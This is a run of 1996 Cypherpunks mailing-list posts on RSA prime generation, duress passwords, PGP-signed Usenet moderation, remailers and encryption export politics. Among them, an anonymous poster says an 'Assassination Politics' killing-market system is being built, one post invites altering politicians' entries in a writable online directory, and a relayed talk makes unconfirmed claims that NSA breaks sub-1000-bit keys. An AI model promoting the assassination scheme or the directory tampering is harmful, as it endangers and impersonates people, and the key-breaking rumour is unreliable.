site was insecure.  It was this arrogance that pissed people off
more than their insecurity.



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTm0vyoZzwIn1bdtAQFHgQGA2lxrjz1dzFmNmveG6yIhdc9xC3ghDr4h
Q12sN3g9/s7uof66Q+bVBpIxsqbeJM0s
=JckI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Sun, 3 Mar 1996 23:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603031511.KAA20026@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C May wrote:

> In some PK code I did several years ago in Mathematica, the primes for the
> RSA modulus were found by picking a "random" (more on this later) starting
> point and then counting up from there, testing for primality (actually,
> pseudoprimality, technically). As one would expect, primes are found fairly
> quickly.

Surely the process of counting up until you get a prime means
that the chances of getting certain primes are greater than
others (eg. 17 is more likely than 19) ?

Gary
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTm2jCoZzwIn1bdtAQEIOwGAg9YkxQXKKS07ZVBvEfzTRaNcxMnZDUYa
sfyzl2mr7UZ94AEoVyWgcsYQXvuFG1QK
=fOGq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 4 Mar 1996 00:12:31 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics 9!
Message-ID: <199603031557.KAA20256@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Sun Mar  3 1996, Just Rich wrote:
: On Sat, 2 Mar 1996, Black Unicorn wrote:
: 
: > On Wed, 28 Feb 1996, jim bell wrote:
: >
: > > "Assassination Politics" Part 9, by Jim Bell, February 27, 1996
: > >
: > > For about a year I have been considering the implications of "Assassination
: > > Politics," and for more than six months I've been sharing the subject and
: > > my musings with you, the interested reader.
: >                   ^^^^^^^^^^^^^^^^^^^^^^^^^^
: > You're pushing it here.
: 
: No he's not. "Reader" is singular, and Jim is on cypherpunks.

Just because you two aren't interested, doesn't mean others aren't.
Work is actually in progress in implementing such a system.



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTnBWSoZzwIn1bdtAQF1zQF7BuwNLQ+C6ql4gUQi5FIaPmdpudvVHKjE
K+HLZRrkUm7ziPXq0tGWecuBJ3ucD6lw
=628g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Mar 1996 03:44:40 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <ad5f2d8f000210042af2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:11 PM 3/3/96, Gary Howland wrote:

>Timothy C May wrote:
>
>> In some PK code I did several years ago in Mathematica, the primes for the
>> RSA modulus were found by picking a "random" (more on this later) starting
>> point and then counting up from there, testing for primality (actually,
>> pseudoprimality, technically). As one would expect, primes are found fairly
>> quickly.
>
>Surely the process of counting up until you get a prime means
>that the chances of getting certain primes are greater than
>others (eg. 17 is more likely than 19) ?

???

I think you are misunderstanding the point. The count doesn't start at 0,
if this is your point...that would be a lot worse than some primes more
common than other, that would mean everyone uses the same prime, e.g., "2."

Rather, one picks a suitably random number, such as
"836480166228153153328299.....845082582622308645" (lots of digits) and
tests it for primality (pseudoprimality). For a several hundred digit
number, only about a one percent chance or less that it's prime. So, one
iterates upward or downward by two (one first makes sure it's odd, as it
must be to be a possible prime).

Sure, the first prime reached is "more likely" to be selected than the
second or third or nth prime reached, but so what? No outsider knows the
seed value, which is where all of the security resides.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 4 Mar 1996 03:48:33 +0800
To: Gary Howland <cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603031913.LAA02889@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 3/3/96 -0500, Gary Howland wrote:
>Surely the process of counting up until you get a prime means
>that the chances of getting certain primes are greater than
>others (eg. 17 is more likely than 19) ?

In order to use this information, one would need to determine 
the number of primes in the vicinity of a potential prime factor.  
This costs more than actually checking for the factor, hence is 
not useful.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Mon, 4 Mar 1996 03:42:52 +0800
To: cypherpunks@toad.com
Subject: Mainstreaming PGP on Usenet
Message-ID: <2.2.32.19960303191053.00697678@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm surprised nobody has brought this up before....

                     FIRST CALL FOR VOTES (of 2)
            moderated group soc.culture.russian.moderated

<snip>

6. Individuals in the database of known readers may post freely to
the group, subject to the conditions in sections 1-4 above.  If need
arises, the robomoderator may perform PGP verification of the
identity of the known reader and, if the reader requests so,
automatically reject all the submissions from the reader without
a valid PGP signature.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: burma@alpha.c2.org
Date: Mon, 4 Mar 1996 04:10:14 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603031926.LAA14487@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello Everyone!

I'm trying to help my friend.  He doesn't have his own computer.  He uses
and abuses the school computers. 

Here is the problem the guy has.

Read on!

I don't know if any of you have problem with scrolling through the
BurmaNet News article recently. It freezes my VT100 screen and give
me KBD LOCKED errors at certain spot. It also freezes the xterm window.
It turn out that the file contains non-printable ( invisible ) charecters, 
dc3, to be exact, which screw up something. 

Below is the octal dump of the BurmaNet content on a unix box. Note the 'dc3'
charecter right before "The definition often the ..." on line 4300
and 6700.

If any of you are having similar problem please drop me a note.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 4 Mar 1996 00:44:20 +0800
To: cypherpunks@toad.com
Subject: MTM_moi
Message-ID: <199603031629.LAA01546@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   EcoMist, March 2, 1996: 
 
   "Many people believe that the Internet will make middlemen 
   extinct. It is more likely to help them thrive." 
 
      The Net's fans argue that it allows consumers to bypass 
      intermediaries while increasing their choices and 
      finding better bargains. One influential proponent of 
      this idea is Bill Gates. Compelling as they seem, 
      however, these arguments do not prove their case. 
 
      Hal Varian, an economist at the UC Berkeley, claims 
      there will be greater competition among intermediaries, 
      and maybe many more of them. Instead of competing on the 
      basis of inside information, those agents will compete 
      by adding value in other ways. 
 
      The Internet will put some intermediaries out of 
      business, but it will create more work for others. And 
      among these will be not only  suppliers of familiar 
      services, but also a new breed monitoring Internet 
      sites, collecting news and information, and repackaging 
      it -- folk, in other words, like Mr Gates. 
 
   MTM_moi 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 4 Mar 1996 01:45:22 +0800
To: cypherpunks@toad.com
Subject: Duress
Message-ID: <960303121209.2020214e@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>Ms. Wilson then gave into the pressure applied and gave
>the passwords required by Justice Haggerty.

Those of you who follow FIREWALLS may recall that I premote the use of
"minefields" on networks, machines that should never be accessed and will 
trigger an alarm/response on any access.

Some years ago I wrote a spec for cryptographic securing of notebooks/
E-Mail that included a "duress" capability: a "password" that, when 
entered would appear to be properly accepted but would report an error 
on retrieval. Optional was to be overwriting of any material whose access 
was attempted.

For some time people have been puzzled when I have said that good systems
protection will increase the risks to the *people* involved just as good
locks on cars led to carjacking.

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 4 Mar 1996 01:50:12 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics 9!
Message-ID: <199603031713.MAA04645@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 03, 1996 10:57:14, 'nobody@REPLAY.COM (Anonymous)' wrote: 
 
 
>Just because you two aren't interested, doesn't mean others aren't. 
>Work is actually in progress in implementing such a system. 
 
 
The Economist of March 2 has a cover story on state, church and private
terrorism, the effectiveness and failures of each, the arguments and
apologies, the savages and the victims, the lucrative concocting of
imaginary enemies -- military, religious, political, personal. 
 
 
It's conclusions are ... well, have a read and dread how the Demon Trio of
state, church and private super-righteous sub-humans will murder you and
your loved ones next to fulfill their blind ambitions. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 4 Mar 1996 04:12:15 +0800
To: speak@fac.org
Subject: cryptography
Message-ID: <2.2.32.19960303072715.006ac3c0@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Response to Freedom Now! program on PBS, regarding expanding use of cryptography by individuals.

- -----------------------------------------------------------

Unfortunately, the NSA representative (Mr. Baker?) on today's (3/3/96) show neglected to mention that the Clinton administration called for the introduction of the Clipper chip in *all* phones, NOT just those used by the government. This may be readily verified online via the archives at the EFF (http://www.eff.org), EPIC (http://www.epic.org), and even the White House' (http://www.whitehouse.gov) own ftp-able copies of the President's speeches.

Also missed was the fact that the Clipper chip would readily permit the implementation of what is called "traffic analysis" - knowing who spoke with whom, regardless of content. Traffic analysis data could readily be misinterpreted. If I were to make a dozen calls to a KKK office, traffic analysis would show such; it would *not* indicate whether the calls were in support of, or opposition to, the KKK's existence.

I found 'interesting' the NSA representative's emphasis of the fact that with the introduction of the automobile, the government's response was licensing and requirements for absolute identification. Extending that response, and the extensive licensing and identification procedures used to (legally) acquire (legal) firearms, to the use of cryptography and communications: are we going to see licensed telephones? Are we going to be obliged to present a National ID card before being able to use a public pay phone? Somehow, I have trouble equating a submachine gun to a Princess phone... but then, I'm not a (probably justifiably so) paranoid government official.

David K. Merriman
merriman@arn.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTks9MVrTvyYOzAZAQF+tQP/Z1WQQ5lA04Lkt1e4pDM6x/MA113+LuAQ
DnKSSy50778cblcW44IimEkeWvxAQ/ee4FYtDlDvpxVgCXJc9ARUdawpZ0eFoCON
5nQ1VixVUMhmMrZYUrx1MFmacvgYDfkqXS7QEHmkrQzvZTKsjM67gs2VKCUhJm0D
p54R34ooaKM=
=1HPq
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LibertyWMA@aol.com
Date: Mon, 4 Mar 1996 03:30:37 +0800
To: putsch@usa.pipeline.com
Subject: Electronic Freedom press release
Message-ID: <960303135004_436931843@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------
NEWS FROM THE 
   MASSACHUSETTS LIBERTARIAN ASSOCIATION
-----------------------------------------------

For Immediate Release

   For Additional Information

   John Brickner
   Electronic Outreach Director
   Massachusetts Libertarian Association
   LibertyWMA@aol.com

----------------------------------------------------

Phillies Endorses Electronic Freedom

George Phillies, Libertarian Party candidate for the U. S. Senate in
Massachusetts, today condemned the so-called Communications Decency Act --
the Internet Censorship Act --and called for its immediate repeal.  Phillies,
a resident of Worcester, will face incumbent Senator John Kerry and Governor
William Weld in the fall election.  He further called for
elimination of controls that are strangling our computer export industry. 

Phillies explained his stand on Electronic Freedoms:  'There is no freedom
more fundamental than freedom of speech, and electronic speech is speech.
 When Congress passes a law against undefined 'indecent' speech, it threatens
all speech.  When Congress extended the Comstock Law to electronic media, it
forbade discussion of abortion by pro-life as well as
pro-choice supporters.  Of course, the Clinton Justice Department says it
won't enforce the Comstock Act.  But what will happen in 1997 if the Buchanan
Justice Department replaces the Clinton Justice Department? 

Export restrictions on software are hurting the computer industry.  Let us
have a reality check here.  PGP and other strong encryption algorithms are
freely available in Europa, Asia, and Africa.  The only companies being hurt
by export restrictions on software are American companies.  The only
people being hurt by export restrictions are American programmers and
manufacturers.  Export restrictions on encryption and other software are
hurting us, while stopping no one from encrypting their data.  The
Libertarian Party supports free trade in computer software, and so do I! 

Export restrictions on computer hardware are even worse, because those
restrictions are a de facto subsidy from the U.S. government to foreign
hardware producers.  When a foreign producer can manufacture a high power
computer, and an American producer cannot export one to compete in the
free market, it is the foreign producer who profits, and American designers,
workers, and shareholders who takes it in the chin.  We have enough
challenges from foreign competition now; we don't need our American
government helping our foreign competitors. 

I have long supported electronic speech and publication as
Constitutionally protected forms of speech and press.  When the Secret
Service raided Steve Jackson Games to suppress publication of 'Hacker' I
immediately wrote Congress to protest. I argued

200 hundred years ago, King George's Hessian mercenaries raided colonial
printers to scattered their typecases; now, Federal agents destroyed
electronic font files.  The physical format of the type was different, but
the act was the same. 

30 years ago, Russian police raided homes of Russian dissidents, destroying
hand-typed samizdat; now, Federal agents destroyed magnetically-stored
manuscripts of a game. The physical format of the manuscript was the
different, but the act was the same. 

In the end, of course, word went out across the Net -- Justice was served.
 Steve Jackson had won his lawsuit.  

'Finally, I remind all computer users, programmers, and designers: Liberty is
indivisible!  By standing together to protect all Constitutional Rights, not
just the ones closest and dearest to our hearts, we make every Right safer.
 We all need to support the whole Bill of Rights, not just the parts that
liberals or Republicans find convenient. 

Support the whole Bill of Rights.  Support Your Electronic Freedom.  Register
and vote Libertarian. 

--------------------------30----------------

Background information

The Libertarian Party is one of Massachusetts' three legally-recognized major
political parties.  Libertarians stand in the dynamic center of the political
spectrum: conservative on fiscal issues, pro-freedom on social issues.  To
place candidates before the voters, Libertarians must satisfy
precisely the same laws that will allow Democrats and Republicans to put
Kerry and Weld on the ballot.  In 1994, a Libertarian running for statewide
office in Massachusetts received over 3% of the vote, more than the
difference between Kerry and Weld in a recent poll. 

------------------------------------------

For Additional Information:
  Contact the Candidate Himself:
  George Phillies
  Massachusetts Libertarian Association
    87-6 Park Avenue
    Worcester MA 01605
  508-831-5334 (w) (Yes, he has a real job.)
  508-754-1859 (h)
  phillies@wpi.edu

--------------------30--------------------------- 

Candidate Biographical Data 

George Phillies was born July 23, 1947 in Buffalo, New York, first son of
Eustace G. Phillies, M.D.(deceased) and Clara Phillies.  Phillies grew up in
Kenmore and Williamsville, New York, finished as salutatorian at the
Williamsville Central High School [now Williamsville North], and came to
M.I.T.  in Cambridge, Massachusetts.  While at MIT, Phillies earned
degrees of Bachelor of Science in physics and in life sciences, as well as
Master of Science and (in 1973) Doctor of Science degrees in physics.
 Phillies then joined the Harvard-MIT Health Sciences and Technology program
as a researcher. 

In 1971, Phillies joined the United States Army Reserves, eventually rising
to the rank of Specialist, 5th Class, in a Boston unit, the 338th Medical
Detachment; he received an honorable discharge in 1977. 

In 1975, Phillies moved to California, working as a postdoctoral fellow in
the U.C.L.A. Chemistry department and living in Santa Monica.  Phillies in
1978 moved to Ann Arbor, Michigan, where he was employed as an Assistant
Professor of Chemistry at the University of Michigan.  In 1985, after
declining alternatives at nationally-known schools, Phillies moved to the
prestigious Worcester Polytechnic Institute, where he rose to the rank of
Professor in the Department of Physics.  Phillies is recognized
internationally for his scientific studies of light scattering, soaps, and
polymer solutions.  Phillies, 48, never married, rents a townhouse in
Worcester, Massachusetts, a block from the WPI Campus. 

In 1994, the Libertarian Party gained major-party status in Massachusetts.
 Phillies has participated actively in Libertarian Party organizing efforts
in Central and Western Massachusetts.  In 1996, he was elected Executive
Director of the Massachusetts Libertarian Association. 




The Bill of Rights:  "I support the whole Bill of Rights, not just the
convenient parts.  I support the freedom of unpopular speech, the freedom to
practice uncommon religions, freedom for consenting adults in the privacy of
their homes, freedom of privacy via exportable strong encryption."

------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Mon, 4 Mar 1996 06:44:34 +0800
To: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <2.2.32.19960303191053.00697678@mail.aracnet.com>
Message-ID: <Pine.SUN.3.91.960303134642.15462A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


comp.os.ms-windows.announce will also start using PGPMoose when I get
around to it, probably today. 

See http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html

-rich
 win-request@metrics.com

On Sun, 3 Mar 1996, Bruce Baugh wrote:

> I'm surprised nobody has brought this up before....
> 
>                      FIRST CALL FOR VOTES (of 2)
>             moderated group soc.culture.russian.moderated
> 
> <snip>
> 
> 6. Individuals in the database of known readers may post freely to
> the group, subject to the conditions in sections 1-4 above.  If need
> arises, the robomoderator may perform PGP verification of the
> identity of the known reader and, if the reader requests so,
> automatically reject all the submissions from the reader without
> a valid PGP signature.
> 
> --
> Bruce Baugh
> bruce@aracnet.com
> http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 4 Mar 1996 04:29:20 +0800
To: cypherpunks@toad.com
Subject: remailer, web site, listserve
Message-ID: <2.2.32.19960303075227.0069b230@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I and a partner are expecting to be online by the 8th of March with a commercial web server (shellback.com).

As part of this presence, I am working on hacking together a program to interface with the SLMail95 (yes, it will be running on a Win95 machine :-) email server to allow operation as a remailer. Initially, I anticipate that it will be a fairly 'dumb' remailer, offering only remailing, reordering, and PGP encryption. Additional CP-style features will be added as my time to implement them permits.

I am offering to maintain an initially limited archives of CP materials and a listserve host (if needed/wanted). I am also actively soliciting (via email to me personally, please, and forgive me if I don't acknowledge it) pointers and materials (files, documents, etc) to include on the site. I have the PGP files from the CP ftp site (before it got 'lost' again), but anything else is *most* welcome.

We will also be offering anonymous email accounts for $5/month.

Following is the PGP key for the remailer we'll be operating (remailer@shellback.com). I want to emphasize that the remailer will *not* keep *any* kind of logs. Bad headers, bounces, or anything else not processed on the first go-through will simply fall into the bitbucket for electron recycling. Since I'll be the postmaster/webmaster, I can say that with no small measure of confidence :-)

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzE0kfEAAAEEALf5sIOqMfEAFi3geJ6aofyaCRy1ZJt8D91QBqPPeU1X3ond
BoIcEcfaMf7s3cOBaiEl7rKFMYqEpL08G7FFelQxc1WRvsR5XtTN+xFB3j0RPNON
vMxju5j6anjPVb2RMnowSYqNKUWIEYd4Soa7L+ZWpaHgLSGkhb6Ex2tu6LdpAAUR
tCFSZW1haWxlciA8cmVtYWlsZXJAc2hlbGxiYWNrLmNvbT6JAJUDBRAxNJK/xWtO
/Jg7MBkBAfiVBACk6dDtebwemmY2+nxK+WD46a0Uj/lwpXLGzJvixdYGo4mwYG2/
LUw/23xBNxLIvPCFR8Qvt9zguyPdMWAp07I64ZlL6yv9Co3DETtTLB8wBdPce6Wx
CLswIWAQ3MSLOmgVB35TzOYrYf5RzYtNKktCl3YDa9mxV4sug9xAx5uxvw==
=9EvL
- -----END PGP PUBLIC KEY BLOCK-----

We return you now to your regularly scheduled anarchy.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTkzSsVrTvyYOzAZAQGVxQP/cFSgADQRFs58aTRv9FmzVFKK5xP4Ew2T
lFajc73ltr0u6qa3luCfZKUqhG93REt8KXqzj2j65i+wrSKzs10DN2N75dEfRHO9
oGm0ka82eTmY+NXLLuNn1THw0+J8EsH9itQD0H4IzEWFkqUYq/C8pEtARF8LCt3V
oKN1V/E6zPs=
=sfA+
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 4 Mar 1996 05:26:58 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
In-Reply-To: <960303121209.2020214e@hobbes.orl.mmc.com>
Message-ID: <LXc9JD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com> writes:
> Those of you who follow FIREWALLS may recall that I premote the use of
> "minefields" on networks, machines that should never be accessed and will
> trigger an alarm/response on any access.
>
> Some years ago I wrote a spec for cryptographic securing of notebooks/
> E-Mail that included a "duress" capability: a "password" that, when
> entered would appear to be properly accepted but would report an error
> on retrieval. Optional was to be overwriting of any material whose access
> was attempted.

As a side remark, every burglar alarm connected to a phone that I've ever seen
has this feature: a code that one can type under duress that will both turn
off the alarm and call for help. I wonder how many users will remember this
code when under duress.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 4 Mar 1996 05:40:12 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
Message-ID: <2.2.32.19960303090718.006a7d38@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:49 PM 03/3/96 EST, dlv@bwalk.dm.com (Dr. Dimitri Vulis) wrote:
>"A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com> writes:
>> Those of you who follow FIREWALLS may recall that I premote the use of
>> "minefields" on networks, machines that should never be accessed and will
>> trigger an alarm/response on any access.
>>
>> Some years ago I wrote a spec for cryptographic securing of notebooks/
>> E-Mail that included a "duress" capability: a "password" that, when
>> entered would appear to be properly accepted but would report an error
>> on retrieval. Optional was to be overwriting of any material whose access
>> was attempted.
>
>As a side remark, every burglar alarm connected to a phone that I've ever seen
>has this feature: a code that one can type under duress that will both turn
>off the alarm and call for help. I wonder how many users will remember this
>code when under duress.
>

Many (if not most) alarm companies make the duress code the *reverse* of the normal code.

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTlEzsVrTvyYOzAZAQG9sAQAjfAQP6pEReh/vzx/dsJKU987FOMbqWgV
Ik/NtzW7fRRzVYmruribT1ZtPQAcPTkdORZC22xHvk82E/m9Awv9q6Zhkbd29/TQ
kcLQ42G3ddcUMA7EWtWtP231tofnyQtM5M7KRdIkKyT7oZdyXgjP42mysjGNDHAy
wv2VcfiPwPQ=
=fc6C
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 4 Mar 1996 07:56:53 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
Message-ID: <199603032311.PAA16326@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:49 PM 3/3/96 -0500, Dr. Dimitri Vulis wrote:

>As a side remark, every burglar alarm connected to a phone that I've ever seen
>has this feature: a code that one can type under duress that will both turn
>off the alarm and call for help. I wonder how many users will remember this
>code when under duress.

The air-transport system has had a Hijack transponder code for years.  The
pilot dials it into the air traffic system radar transponder when the plane
is hijacked.  However there is a problem.

One of the private pilot magazines reported that a small plane operator
used the code (because his airplane was, in fact, being hijacked).  When he
landed the airplane, it was surrounded by LEA, and in the ensuing gun
battle, everyone on the airplane died.  The went on to say that the safety
of the passengers and airplane are the pilot's primary responsibility and
that pilots should consider this incident when deciding to use the code.

Duress codes need to be designed to minimized the chance of such responses
when they are used.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlove@olywa.net (Matt Love)
Date: Mon, 4 Mar 1996 07:55:50 +0800
To: cypherpunks@toad.com
Subject: Leslie Fish address?
Message-ID: <19960303231302714.AAA296@[205.163.58.206]>
MIME-Version: 1.0
Content-Type: text/plain



Do you know of an e-mail address for Leslie Fish?

m






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Mon, 4 Mar 1996 08:33:13 +0800
To: cypherpunks@toad.com
Subject: Interesting Identity Hacking Experiment: www.switchboard.com
Message-ID: <Pine.SUN.3.91.960303152557.15462C-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.switchboard.com/ is a white pages directory. Basically, it's 
the Database America CD-ROM on the Web. The difference is, it's 
writeable, and free.

Pretty cool. I don't think it was wise for them to allow anyone with an
email address to change anyone else's white pages entry, though. 

Can anyone think of a prominent politician who would be in the phone 
book? The freeform "more information" field is just asking to be used.

Potentially interesting applications for anonymous web proxies and secure
pseudonym servers. 

At least they don't make direct changes to the database -- I'd guess they
only set a flag to look in the separate user-supplied file.  I.e., I
changed my entry, then hit "unregister," and all the original information
returned immediately. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Mar 1996 05:33:12 +0800
Subject: Re: your mail
In-Reply-To: <199603031418.JAA09675@black-ice.gateway.com>
Message-ID: <Pine.SUN.3.91.960303155543.24935C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Anonymous Remail Service wrote:
[...]

> >I attended last weeks "Information, National Policies, and International
> >Infrastructure" Symposium at Harvard Law School, organized by the Global
> >Information Infrastructure Commission, the Kennedy School and the
> >Institute for Information Technology Law & Policy of Harvard Law School.
> >
> >During the presentation by Paul Strassmann, National Defense University
> >and William Marlow, Science Applications International Corporation,
> >entitled "Anonymous Remailers as Risk-Free International Infoterrorists"
> >the questions was raised from audience (Professor Chaarles Nesson,
> >Harvard LAw School) - in a rather extended debate - whether the CIA and
> >similar government agencies are involved in running anonymous remailers
> >as this would be a perfect target to scan possibly illegal messages.
> >
> >Both presenters explicitly acknowledged that a number of anonymous
> >remnailers in the US are run by government agencies scanning traffic.
> >Marlow said that the government runs at least a dozen remailers and that
> >the most popular remailers in France and Germany are run by the
> >respective government agencies in these countries. In addition they
> >mentioned that the NSA has successfully developed systems to break
> >encrypted messages below 1000 bit of key length and strongly suggested
> >to use at least 1024 bit keys. They said that they semselves use 1024
> >bit keys.

[...]

> >Viktor Mayer-Schoenberger
> >Information Law Project
> >Austrian Institute for Legal Policy
> Groundfog@alpha.c2.org

What this demonstrates, regardless of the legitimacy of the claim, is the 
need for a web of trust that does more than estlablish the link between 
key and user, but one that distributes reputation capital.

The ability to assign reputation to remailers via digital signature is 
going to be of increasing importance, as is the use of larger keys by 
remail-operators.

Are there any grassroots projects on the table to address the former problem?

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 4 Mar 1996 09:06:31 +0800
To: Matt Love <mlove@olywa.net>
Subject: Re: Leslie Fish address?
In-Reply-To: <19960303231302714.AAA296@[205.163.58.206]>
Message-ID: <Pine.SOL.3.91.960303160922.9795A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Matt Love wrote:

> 
> Do you know of an e-mail address for Leslie Fish?

try asking on alt.music.filk; 

obcrypto:
	Has anybody tried setting RSA or DH to music; then trying to export
a recording, espeically if the tpae can be understood by a voice 
recognition system? That would make t-shirts look sensible
	
---
